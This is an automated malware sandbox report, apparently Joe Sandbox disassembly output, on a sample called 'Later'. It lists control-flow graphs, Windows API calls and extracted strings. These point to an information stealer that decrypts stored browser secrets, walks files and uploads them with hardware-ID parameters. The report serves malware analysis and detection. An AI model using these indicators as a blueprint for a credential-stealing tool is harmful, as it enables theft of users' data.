14d8e70 4361->4373 4374 14222ec-14222fa 4361->4374 4362->4348 4363->4340 4363->4362 4379 14225c8-14225cf call 14d8e70 4367->4379 4380 14225b8-14225c6 4367->4380 4373->4360 4374->4211 4374->4373 4379->4366 4380->4340 4380->4379 4402 1422390-1422397 4391->4402 4403 142236b-1422374 4391->4403 4396 1422356-142235d call 14d8e70 4392->4396 4397 1422346-1422354 4392->4397 4396->4391 4397->4211 4397->4396 4402->4144 4406 1422386-142238d call 14d8e70 4403->4406 4407 1422376-1422384 4403->4407 4406->4402 4407->4211 4407->4406 4416 1421bb6-1421bc7 4414->4416 4417 1421be7-1421beb 4414->4417 4423 1421b72-1421b7c 4415->4423 4424 1421b4f-1421b51 4415->4424 4419 1421bc9-1421bd7 4416->4419 4420 1421bdd-1421be4 call 14d8e70 4416->4420 4417->4328 4417->4329 4419->4195 4419->4420 4420->4417 4423->4414 4427 1421b7e-1421b8a 4423->4427 4424->4423 4426 1421b53-1421b6a call 1415ef0 4424->4426 4426->4423 4428 1421ba0-1421ba7 call 14d8e70 4427->4428 4429 1421b8c-1421b9a 4427->4429 4428->4414 4429->4195 4429->4428
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: &hwid=$&version=$0$GET$\Temp\$application/x-www-form-urlencoded$browsers:$connect$getpu$https$invalid stoi argument$msg$path$stoi argument out of range$svchost.exe$test
                                        • API String ID: 0-4002825708
                                        • Opcode ID: ed7e26c1efc7e022290f95ace033abdfd4ad061cf8df871dba618c5e55b4a9d8
                                        • Instruction ID: 4227c855b27ef1bcfa28c422c28fe967dd41d92660cfea544afa11f473e05a16
                                        • Opcode Fuzzy Hash: ed7e26c1efc7e022290f95ace033abdfd4ad061cf8df871dba618c5e55b4a9d8
                                        • Instruction Fuzzy Hash: 1492F570D002298FEB24DF68CC58BADBBB1BF65314F64819ED049A72A1DB749AC4CF51
                                        APIs
                                        • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020019,00000000,940E2C7A,00000000), ref: 01417653
                                        • RegEnumKeyW.ADVAPI32(00000000,00000000,?,0000020A), ref: 01417693
                                        • RegGetValueW.KERNELBASE(80000002,00000000,01510418,0000FFFF,00000000,?,00002000), ref: 014177D5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: EnumOpenValue
                                        • String ID: | ver. $\shell\open\command$list too long
                                        • API String ID: 2571532894-685068868
                                        • Opcode ID: fcefa3e19a738fe6afa4c5755c72c113eaa202b3339cd115ecc9fb92c746bc40
                                        • Instruction ID: 00c5961e28a352048db43000f7918279dcb553d93178207ef2ec8813766a184f
                                        • Opcode Fuzzy Hash: fcefa3e19a738fe6afa4c5755c72c113eaa202b3339cd115ecc9fb92c746bc40
                                        • Instruction Fuzzy Hash: A8A2D170D042598FEB25CB28CD447ADBBB5EF95314F0482D9D40CA72A5DB79AAC4CF90

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 5457 1410810-1410817 5458 141081d-1410840 5457->5458 5459 1410c2e-1410c3e FindNextFileW 5457->5459 5461 1410843-141084c 5458->5461 5459->5457 5460 1410c44-1410c4f FindClose 5459->5460 5463 1410c55-1410c75 call 14279a0 5460->5463 5464 1410ea8-1410ecd call 14227a0 call 14d88d1 5460->5464 5461->5461 5462 141084e-14108ac call 14247c0 call 14279c0 5461->5462 5478 14108b2-141090f call 1423b80 call 14287f0 5462->5478 5479 1410b8b-1410b98 5462->5479 5473 1410c78-1410c7d 5463->5473 5473->5473 5474 1410c7f-1410cc9 call 14d8e7e call 14ddcf5 FindFirstFileW 5473->5474 5497 1410ea1-1410ea2 FindClose 5474->5497 5498 1410ccf-1410cdb 5474->5498 5504 1410b41-1410b4e 5478->5504 5505 1410915-1410939 5478->5505 5481 1410bc9-1410bf1 5479->5481 5482 1410b9a-1410ba9 5479->5482 5487 1410bf3-1410c08 5481->5487 5488 1410c28 5481->5488 5485 1410bab-1410bb9 5482->5485 5486 1410bbf-1410bc6 call 14d8e70 5482->5486 5485->5486 5491 1410ed8-1410edf call 14e4fe0 5485->5491 5486->5481 5493 1410c0a-1410c18 5487->5493 5494 1410c1e-1410c25 call 14d8e70 5487->5494 5488->5459 5493->5491 5493->5494 5494->5488 5497->5464 5503 1410ce0-1410ce7 5498->5503 5507 1410e80-1410e95 FindNextFileW 5503->5507 5508 1410ced-1410cfd lstrcmpW 5503->5508 5509 1410b81-1410b85 5504->5509 5510 1410b50-1410b61 5504->5510 5511 1410940-1410945 5505->5511 5507->5503 5512 1410e9b 5507->5512 5508->5507 5513 1410d03-1410d13 lstrcmpW 5508->5513 5509->5478 5509->5479 5514 1410b63-1410b71 5510->5514 5515 1410b77-1410b7e call 14d8e70 5510->5515 5511->5511 5516 1410947-14109de call 1424b80 call 1423a20 call 1425e60 5511->5516 5512->5497 5513->5507 5517 1410d19-1410d3f 5513->5517 5514->5491 5514->5515 5515->5509 5531 14109e0-14109ef 5516->5531 5532 1410a0f-1410a37 5516->5532 5522 1410d40-1410d49 5517->5522 5522->5522 5524 1410d4b-1410dd9 call 14247c0 call 14279c0 call 14279a0 call 1422900 call 1410730 5522->5524 5524->5507 5535 14109f1-14109ff 5531->5535 5536 1410a05-1410a0c call 14d8e70 5531->5536 5537 1410a39-1410a48 5532->5537 5538 1410a68-1410a98 5532->5538 5535->5491 5535->5536 5536->5532 5543 1410a4a-1410a58 5537->5543 5544 1410a5e-1410a65 call 14d8e70 5537->5544 5540 1410ece-1410ed3 call 14c349c 5538->5540 5541 1410a9e-1410b10 call 14d8ada call 1423b80 5538->5541 5540->5491 5541->5504 5556 1410b12-1410b21 5541->5556 5543->5491 5543->5544 5544->5538 5557 1410b23-1410b31 5556->5557 5558 1410b37-1410b3e call 14d8e70 5556->5558 5557->5491 5557->5558 5558->5504
                                        APIs
                                        • FindNextFileW.KERNELBASE(?,00000010), ref: 01410C36
                                        • FindClose.KERNEL32(00000000,?,?,?,?,940E2C7A), ref: 01410C45
                                        • FindFirstFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,940E2C7A), ref: 01410CB8
                                        • lstrcmpW.KERNEL32(?,0151266C,?,?,?,?,?,?,?,?,?,?,?,940E2C7A), ref: 01410CF9
                                        • lstrcmpW.KERNEL32(?,01512674,?,?,?,?,?,?,?,?,?,?,?,940E2C7A), ref: 01410D0F
                                        • FindNextFileW.KERNEL32(?,00000010,?,?,?,?,?,?,?,?,?,?,?,940E2C7A), ref: 01410E8D
                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,940E2C7A), ref: 01410EA2
                                          • Part of subcall function 014C349C: std::invalid_argument::invalid_argument.LIBCONCRT ref: 014C34A8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseNextlstrcmp$Firststd::invalid_argument::invalid_argument
                                        • String ID: %s\%s$%s\*$list too long
                                        • API String ID: 2135687296-1613067349
                                        • Opcode ID: 9da44555ca3414c135cfbc68b0579ab9c28f4b95ac87bb558a7fe29789e7cbaf
                                        • Instruction ID: 8b8b50d1b064a4e9c5167efef7fe4c7cd5d575d5a8e9633dad953f3d1f384d15
                                        • Opcode Fuzzy Hash: 9da44555ca3414c135cfbc68b0579ab9c28f4b95ac87bb558a7fe29789e7cbaf
                                        • Instruction Fuzzy Hash: 9402C1719001198BDB28CB28CD98BEEBB75BF61314F1482DAE509A72A5DB359FC4CF50

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 5696 1410730-14107ae call 14279a0 5699 14107b0-14107b5 5696->5699 5699->5699 5700 14107b7-1410801 call 14d8e7e call 14ddcf5 FindFirstFileW 5699->5700 5705 1410c44-1410c4f FindClose 5700->5705 5706 1410c55-1410c75 call 14279a0 5705->5706 5707 1410ea8-1410ecd call 14227a0 call 14d88d1 5705->5707 5713 1410c78-1410c7d 5706->5713 5713->5713 5714 1410c7f-1410cc9 call 14d8e7e call 14ddcf5 FindFirstFileW 5713->5714 5720 1410ea1-1410ea2 FindClose 5714->5720 5721 1410ccf-1410cdb 5714->5721 5720->5707 5722 1410ce0-1410ce7 5721->5722 5723 1410e80-1410e95 FindNextFileW 5722->5723 5724 1410ced-1410cfd lstrcmpW 5722->5724 5723->5722 5725 1410e9b 5723->5725 5724->5723 5726 1410d03-1410d13 lstrcmpW 5724->5726 5725->5720 5726->5723 5727 1410d19-1410d3f 5726->5727 5728 1410d40-1410d49 5727->5728 5728->5728 5729 1410d4b-1410dd9 call 14247c0 call 14279c0 call 14279a0 call 1422900 call 1410730 5728->5729 5729->5723
                                        APIs
                                        • FindFirstFileW.KERNELBASE(00000000,?,?,?,?,?,940E2C7A), ref: 014107F0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileFindFirst
                                        • String ID: %s\%s$%s\*
                                        • API String ID: 1974802433-2848263008
                                        • Opcode ID: 19e2232795e83e980749b2ebf9dcbec04947bf03f1e8c760f51dc1aef952a200
                                        • Instruction ID: a628b7a65fe734b157aaf932c79e35ce0468c1909c211930a5448113d031692f
                                        • Opcode Fuzzy Hash: 19e2232795e83e980749b2ebf9dcbec04947bf03f1e8c760f51dc1aef952a200
                                        • Instruction Fuzzy Hash: 4D71C8B19011199BDB25DB59DC44FEAB7B8FF14300F0442EAE909A7194EB305F89CFA4
                                        APIs
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01447F32
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014480F3
                                        Strings
                                        • f66f7a17b78ba617acde90fc810107f34f1a1f2e, xrefs: 01447DC4
                                        • cannot open file at line %d of [%.10s], xrefs: 01447DCE
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                        • String ID: cannot open file at line %d of [%.10s]$f66f7a17b78ba617acde90fc810107f34f1a1f2e
                                        • API String ID: 885266447-2115094429
                                        • Opcode ID: e2f71c2af6a8decdc54985471231b6bcf7a21f8a39cc9a6002735fce4bfecfa8
                                        • Instruction ID: 8d3b22d148c8d8f2b0b5966b3c663a73b420d16f9fcb91b5871feddb3c95fc13
                                        • Opcode Fuzzy Hash: e2f71c2af6a8decdc54985471231b6bcf7a21f8a39cc9a6002735fce4bfecfa8
                                        • Instruction Fuzzy Hash: ADF1CDB0A047429FF725CF68C840B6BB7E1BF84215F044A1EE9589B3A1D7B4E946C7D2
                                        APIs
                                        • GetLocaleInfoEx.KERNELBASE(?,?,014D8116,?,00000022,00000000,00000002,?,?,014CE822,00000004,014C94B7,?,00000004,014CA650,00000000), ref: 014D8421
                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,?,?,?,014D8116,?,00000022,00000000,00000002,?,?,014CE822,00000004,014C94B7), ref: 014D842C
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: InfoLocale
                                        • String ID:
                                        • API String ID: 2299586839-0
                                        • Opcode ID: 205c0ac92e681791dd48c3f358666271e2209a237ab0e43d7fa6066340d6fa05
                                        • Instruction ID: b9f62cdab04b49d9f5d4bbfb349159590724f33c490f06a53d766d152a07d139
                                        • Opcode Fuzzy Hash: 205c0ac92e681791dd48c3f358666271e2209a237ab0e43d7fa6066340d6fa05
                                        • Instruction Fuzzy Hash: 02E01D32541129AFCF125FD5FC148BE7F29FF047617050019F9155A224DF725810EBD1
                                        APIs
                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 014114C2
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CryptDataUnprotect
                                        • String ID:
                                        • API String ID: 834300711-0
                                        • Opcode ID: c65f12b8129b6f732494f0f2874202d95871b0ef6ce712eb589a8688af90f47c
                                        • Instruction ID: 944e19eb33cd739e5cbc4734269420be81e69f483552aff04e48630f7b4c778f
                                        • Opcode Fuzzy Hash: c65f12b8129b6f732494f0f2874202d95871b0ef6ce712eb589a8688af90f47c
                                        • Instruction Fuzzy Hash: 794167B5E002598FDB218F7D98417FFBFE8EF56A00F48006EDA869B319D2356405C7A1

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 3725 14ba640-14ba678 3726 14ba67a 3725->3726 3727 14ba67c-14ba6a6 call 14b9860 * 2 3725->3727 3726->3727 3732 14ba6a8 3727->3732 3733 14ba6ac-14ba6c1 call 14b9960 3727->3733 3732->3733 3736 14ba6c3-14ba6c5 3733->3736 3737 14ba6c7-14ba6c9 3733->3737 3738 14ba6cb-14ba6ef SysFreeString 3736->3738 3737->3738 3739 14ba732-14ba737 3738->3739 3740 14ba6f1-14ba6f9 3738->3740 3741 14ba739-14ba741 3739->3741 3742 14ba77f-14ba78b 3739->3742 3740->3739 3743 14ba6fb-14ba6ff 3740->3743 3746 14ba778 3741->3746 3747 14ba743-14ba745 3741->3747 3744 14ba7ce-14ba7d0 3742->3744 3745 14ba78d-14ba793 3742->3745 3748 14ba70a-14ba70f 3743->3748 3749 14ba701-14ba704 3743->3749 3750 14ba8a2-14ba8bd CoSetProxyBlanket 3744->3750 3751 14ba7d6-14ba7df 3744->3751 3745->3744 3752 14ba795-14ba797 3745->3752 3746->3742 3747->3746 3753 14ba747-14ba74b 3747->3753 3754 14ba721-14ba72f call 14d8e70 3748->3754 3755 14ba711-14ba71a call 14d88e2 3748->3755 3749->3748 3760 14ba90a-14ba928 call 14d88d1 3750->3760 3761 14ba8bf-14ba8c8 3750->3761 3756 14ba889-14ba89d call 1423b20 3751->3756 3757 14ba7e5-14ba7ec 3751->3757 3752->3744 3759 14ba799-14ba79d 3752->3759 3762 14ba74d-14ba750 3753->3762 3763 14ba756-14ba75b 3753->3763 3754->3739 3755->3754 3802 14ba93d 3756->3802 3757->3756 3767 14ba929-14ba936 call 1423b20 3757->3767 3768 14ba83e-14ba852 call 1423b20 3757->3768 3769 14ba80c-14ba820 call 1423b20 3757->3769 3770 14ba7f3-14ba807 call 1423b20 3757->3770 3771 14ba870-14ba884 call 1423b20 3757->3771 3772 14ba857-14ba86b call 1423b20 3757->3772 3773 14ba825-14ba839 call 1423b20 3757->3773 3777 14ba79f-14ba7a6 SysFreeString 3759->3777 3778 14ba7ac-14ba7b1 3759->3778 3779 14ba8ca-14ba8f0 call 1423b20 call 14ba3f0 3761->3779 3780 14ba8f2-14ba908 call 1423b20 3761->3780 3762->3763 3781 14ba76d-14ba775 call 14d8e70 3763->3781 3782 14ba75d-14ba766 call 14d88e2 3763->3782 3767->3802 3768->3802 3769->3802 3770->3802 3771->3802 3772->3802 3773->3802 3777->3778 3786 14ba7c3-14ba7cb call 14d8e70 3778->3786 3787 14ba7b3-14ba7bc call 14d88e2 3778->3787 3819 14ba952-14ba953 call 14da47e 3779->3819 3816 14ba93e-14ba94f call 14ba3f0 3780->3816 3781->3746 3782->3781 3786->3744 3787->3786 3802->3816 3816->3819
                                        APIs
                                        • SysFreeString.OLEAUT32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,\\.\root\,00000000,940E2C7A,00000000,00000000,?), ref: 014BA6DF
                                        • SysFreeString.OLEAUT32(00000000), ref: 014BA7A0
                                          • Part of subcall function 014DA47E: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,014C34BB,?,01524438,?), ref: 014DA4DE
                                        Strings
                                        • Error initializing IWbemServices: WBEM_E_TRANSPORT_FAILURE, xrefs: 014BA857
                                        • Error executing query: WBEM_E_INVALID_PARAMETER, xrefs: 014BAB60
                                        • Error initializing IWbemServices: WBEM_E_ACCESS_DENIED, xrefs: 014BA929
                                        • Coult not set proxy blanket: Unknown Error, xrefs: 014BA8CA
                                        • Error initializing IWbemServices: WBEM_E_INVALID_PARAMETER, xrefs: 014BA825
                                        • Error executing query: WBEM_E_TRANSPORT_FAILURE, xrefs: 014BABA8
                                        • Error executing query: WBEM_E_INVALID_CLASS, xrefs: 014BAB47
                                        • Error executing query: WBEM_E_ACCESS_DENIED, xrefs: 014BAC08
                                        • Error initializing IWbemServices: Unknown Error, xrefs: 014BA889
                                        • \\.\root\, xrefs: 014BA687
                                        • NULL, xrefs: 014BAF54
                                        • Coult not set proxy blanket: E_INVALIDARG, xrefs: 014BA8F2
                                        • Error executing query: WBEM_E_FAILED, xrefs: 014BAB2E
                                        • Error executing query: WBEM_E_SHUTTING_DOWN, xrefs: 014BAB92
                                        • Error executing query: WBEM_E_OUT_OF_MEMORY, xrefs: 014BAB79
                                        • Error initializing IWbemServices: WBEM_E_LOCAL_CREDENTIALS, xrefs: 014BA870
                                        • Error initializing IWbemServices: WBEM_E_FAILED, xrefs: 014BA7F3
                                        • Error initializing IWbemServices: WBEM_E_OUT_OF_MEMORY, xrefs: 014BA83E
                                        • Error initializing IWbemServices: WBEM_E_INVALID_NAMESPACE, xrefs: 014BA80C
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FreeString$ExceptionRaise
                                        • String ID: Coult not set proxy blanket: E_INVALIDARG$Coult not set proxy blanket: Unknown Error$Error executing query: WBEM_E_ACCESS_DENIED$Error executing query: WBEM_E_FAILED$Error executing query: WBEM_E_INVALID_CLASS$Error executing query: WBEM_E_INVALID_PARAMETER$Error executing query: WBEM_E_OUT_OF_MEMORY$Error executing query: WBEM_E_SHUTTING_DOWN$Error executing query: WBEM_E_TRANSPORT_FAILURE$Error initializing IWbemServices: Unknown Error$Error initializing IWbemServices: WBEM_E_ACCESS_DENIED$Error initializing IWbemServices: WBEM_E_FAILED$Error initializing IWbemServices: WBEM_E_INVALID_NAMESPACE$Error initializing IWbemServices: WBEM_E_INVALID_PARAMETER$Error initializing IWbemServices: WBEM_E_LOCAL_CREDENTIALS$Error initializing IWbemServices: WBEM_E_OUT_OF_MEMORY$Error initializing IWbemServices: WBEM_E_TRANSPORT_FAILURE$NULL$\\.\root\
                                        • API String ID: 1341702900-3789978394
                                        • Opcode ID: e34f373b028820e99195682161fe667be26613c91f1ba4974a482da22dd93acf
                                        • Instruction ID: 28d5aa70c094ee4c0ad2f8b52048420dffdbffdefac941443d107dca50a61a05
                                        • Opcode Fuzzy Hash: e34f373b028820e99195682161fe667be26613c91f1ba4974a482da22dd93acf
                                        • Instruction Fuzzy Hash: 3E81F971941215EBEB21DF95DD90FEFBBB4BF20B10F20451EE4026B2A0DB749A44CBA0

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 4433 14bb680-14bb6d5 4435 14bb703-14bb728 SafeArrayGetLBound SafeArrayGetUBound 4433->4435 4436 14bb6d7-14bb6e0 4433->4436 4439 14bb72b-14bb731 4435->4439 4437 14bb9a3-14bb9d1 call 1423b20 call 14ba3f0 call 14da47e 4436->4437 4438 14bb6e6-14bb6ec 4436->4438 4484 14bb9d6-14bba00 call 1423b20 call 14ba3f0 call 14da47e 4437->4484 4441 14bb6f2-14bb6f8 4438->4441 4442 14bb970-14bb99e call 1423b20 call 14ba3f0 call 14da47e 4438->4442 4443 14bb8d1-14bb8df SafeArrayDestroy 4439->4443 4444 14bb737-14bb74c SafeArrayGetElement 4439->4444 4446 14bb6fe-14bb938 call 1423b20 call 14ba3f0 call 14da47e 4441->4446 4447 14bb93d-14bb96b call 1423b20 call 14ba3f0 call 14da47e 4441->4447 4442->4437 4448 14bb8f2-14bb90d call 14d88d1 4443->4448 4449 14bb8e1-14bb8ee 4443->4449 4450 14bb77a-14bb79b VariantInit 4444->4450 4451 14bb74e-14bb757 4444->4451 4446->4447 4447->4442 4449->4448 4476 14bb79d-14bb7a6 4450->4476 4477 14bb7b3-14bb7d0 4450->4477 4456 14bba6b-14bba99 call 1423b20 call 14ba3f0 call 14da47e 4451->4456 4457 14bb75d-14bb763 4451->4457 4489 14bba9e-14bbacb call 1423b20 call 14ba3f0 call 14da47e 4456->4489 4463 14bb769-14bb76f 4457->4463 4464 14bba38-14bba66 call 1423b20 call 14ba3f0 call 14da47e 4457->4464 4473 14bba05-14bba33 call 1423b20 call 14ba3f0 call 14da47e 4463->4473 4474 14bb775 4463->4474 4464->4456 4473->4464 4474->4484 4480 14bb7ac 4476->4480 4481 14bbb66-14bbb93 call 1423b20 call 14ba3f0 call 14da47e 4476->4481 4482 14bb7d3-14bb7dc 4477->4482 4480->4477 4480->4481 4480->4489 4490 14bbb02-14bbb2f call 1423b20 call 14ba3f0 call 14da47e 4480->4490 4491 14bbad0-14bbafd call 1423b20 call 14ba3f0 call 14da47e 4480->4491 4492 14bbb34-14bbb61 call 1423b20 call 14ba3f0 call 14da47e 4480->4492 4539 14bbb98 call 14c345f 4481->4539 4482->4482 4493 14bb7de-14bb806 call 14247c0 call 14baec0 4482->4493 4484->4473 4489->4491 4490->4492 4491->4490 4492->4481 4493->4539 4540 14bb80c-14bb816 call 14c0f80 4493->4540 4544 14bbb9d-14bbc53 call 14e4fe0 call 1423960 call 14237f0 call 1423810 call 14279c0 call 1423b20 call 1425d60 call 1425c20 call 1425e60 call 14ba3f0 call 14da47e 4539->4544 4543 14bb818-14bb824 4540->4543 4545 14bb858-14bb876 4543->4545 4546 14bb826-14bb838 4543->4546 4548 14bb8aa-14bb8c6 VariantClear SysFreeString 4545->4548 4549 14bb878-14bb88a 4545->4549 4551 14bb83a-14bb848 4546->4551 4552 14bb84e-14bb855 call 14d8e70 4546->4552 4548->4443 4556 14bb8c8-14bb8cc 4548->4556 4554 14bb88c-14bb89a 4549->4554 4555 14bb8a0-14bb8a7 call 14d8e70 4549->4555 4551->4544 4551->4552 4552->4545 4554->4544 4554->4555 4555->4548 4556->4439
                                        APIs
                                        • SafeArrayGetLBound.OLEAUT32(00000000,00000001,?), ref: 014BB713
                                        • SafeArrayGetUBound.OLEAUT32(00000000,00000001,?), ref: 014BB722
                                        • SafeArrayGetElement.OLEAUT32(00000000,?,00000000), ref: 014BB742
                                          • Part of subcall function 014DA47E: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,014C34BB,?,01524438,?), ref: 014DA4DE
                                        Strings
                                        • Could not get property: WBEM_E_OUT_OF_MEMORY, xrefs: 014BBB34
                                        • Could not get name from SafeArray: E_OUTOFMEMORY, xrefs: 014BBA38
                                        • Could not get property: WBEM_E_FAILED, xrefs: 014BBA9E
                                        • Could not get properties: WBEM_E_INVALID_PARAMETER, xrefs: 014BB93D
                                        • Could not get properties: WBEM_E_OUT_OF_MEMORY, xrefs: 014BB970
                                        • Could not get property: Unknown Error, xrefs: 014BBB66
                                        • Could not get name from SafeArray: DISP_E_BADINDEX, xrefs: 014BBA6B
                                        • Could not get name from SafeArray: Unknown Error, xrefs: 014BB9D6
                                        • Could not get property: WBEM_E_NOT_FOUND, xrefs: 014BBB02
                                        • Could not get properties: WBEM_E_FAILED, xrefs: 014BB90E, 014BB9A3
                                        • Could not get property: WBEM_E_INVALID_PARAMETER, xrefs: 014BBAD0
                                        • Could not get name from SafeArray: E_INVALIDARG, xrefs: 014BBA05
                                        • Can't convert parameter: , xrefs: 014BBBDA
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ArraySafe$Bound$ElementExceptionRaise
                                        • String ID: Can't convert parameter: $Could not get name from SafeArray: DISP_E_BADINDEX$Could not get name from SafeArray: E_INVALIDARG$Could not get name from SafeArray: E_OUTOFMEMORY$Could not get name from SafeArray: Unknown Error$Could not get properties: WBEM_E_FAILED$Could not get properties: WBEM_E_INVALID_PARAMETER$Could not get properties: WBEM_E_OUT_OF_MEMORY$Could not get property: Unknown Error$Could not get property: WBEM_E_FAILED$Could not get property: WBEM_E_INVALID_PARAMETER$Could not get property: WBEM_E_NOT_FOUND$Could not get property: WBEM_E_OUT_OF_MEMORY
                                        • API String ID: 966256350-1455836236
                                        • Opcode ID: cb0edfde878b0dfb15c860524ea6127bb3a1b53c412d559ebe9319ffe8f2271f
                                        • Instruction ID: 9d4cc871c644aa4795eb1bbc4c8813762701551b676f7596611da817f390bcd7
                                        • Opcode Fuzzy Hash: cb0edfde878b0dfb15c860524ea6127bb3a1b53c412d559ebe9319ffe8f2271f
                                        • Instruction Fuzzy Hash: D6F1A331D40259AADF15EBA5CC95FDEBB78FF29300F50816EE401B7260DB74AA48CB61
                                        APIs
                                        • GetFileAttributesA.KERNELBASE(?,\Temp\,?), ref: 0141F08C
                                        • PathFindFileNameA.KERNELBASE(?), ref: 0141F17E
                                          • Part of subcall function 01410730: FindFirstFileW.KERNELBASE(00000000,?,?,?,?,?,940E2C7A), ref: 014107F0
                                        • CreateFileA.KERNELBASE(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 0141F394
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0141F3AC
                                        • ReadFile.KERNELBASE(?,00000000,?,?,00000000), ref: 0141F3DD
                                        • CloseHandle.KERNEL32(?), ref: 0141F3E9
                                        • SetFileAttributesA.KERNELBASE(?,00000080), ref: 0141F832
                                        • DeleteFileA.KERNELBASE(?), ref: 0141F83E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$AttributesFind$CloseCreateDeleteFirstHandleNamePathReadSize
                                        • String ID: <AND>file=$<AND>filename=$<AND>hwid=$\Temp\$application/octet-stream$invalid stoi argument$sendfiles$stoi argument out of range
                                        • API String ID: 1664396084-3162059244
                                        • Opcode ID: 40789e94fa82dd78387007d38c39384b63a7ddb52052c79cf3be37183fdbe581
                                        • Instruction ID: 3ef9aa3f1f94c6ef5670837fade3977e85eb38b22f2c5924c21f745af9865b29
                                        • Opcode Fuzzy Hash: 40789e94fa82dd78387007d38c39384b63a7ddb52052c79cf3be37183fdbe581
                                        • Instruction Fuzzy Hash: 40A2FF70D00259DFEB25CF68CD48BEDBBB1AF55304F20829DD408AB2A5DB755A89CF50

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 4876 1441c50-1441c8b 4877 1441c90-1441cf4 call 14db0a0 4876->4877 4880 1441cf6-1441d05 call 1441690 4877->4880 4881 1441d13-1441d2b 4877->4881 4885 14420a9-14420bc call 14d88d1 4880->4885 4886 1441d0b-1441d0f 4880->4886 4887 1441d31-1441d45 call 143ac50 4881->4887 4888 1442098-14420a6 call 143b080 4881->4888 4886->4881 4895 1441d57 4887->4895 4896 1441d47-1441d55 call 14db0a0 4887->4896 4888->4885 4898 1441d5b-1441d5d 4895->4898 4896->4898 4898->4888 4900 1441d63-1441d7a 4898->4900 4902 1441d7c-1441d87 call 143b080 4900->4902 4903 1441d8b-1441d8d 4900->4903 4902->4903 4903->4888 4905 1441d93-1441da2 4903->4905 4907 1441da6-1441db6 4905->4907 4909 1441dfe-1441e05 4907->4909 4910 1441db8-1441dc4 4907->4910 4911 1441e07-1441e09 4909->4911 4912 1441e0f-1441e2a 4909->4912 4910->4912 4918 1441dc6-1441dc9 4910->4918 4911->4912 4913 1441f5d-1441f8a call 143b080 * 2 call 14d88d1 4911->4913 4914 1441e33-1441e3c 4912->4914 4915 1441e2c-1441e31 4912->4915 4917 1441e3f-1441e52 4914->4917 4915->4917 4920 1441e55-1441e6d CreateFileW 4917->4920 4922 1441deb-1441dfc 4918->4922 4923 1441dcb-1441dce 4918->4923 4925 1441ec7-1441ecb 4920->4925 4926 1441e6f-1441e7f 4920->4926 4922->4907 4923->4922 4924 1441dd0-1441dd3 4923->4924 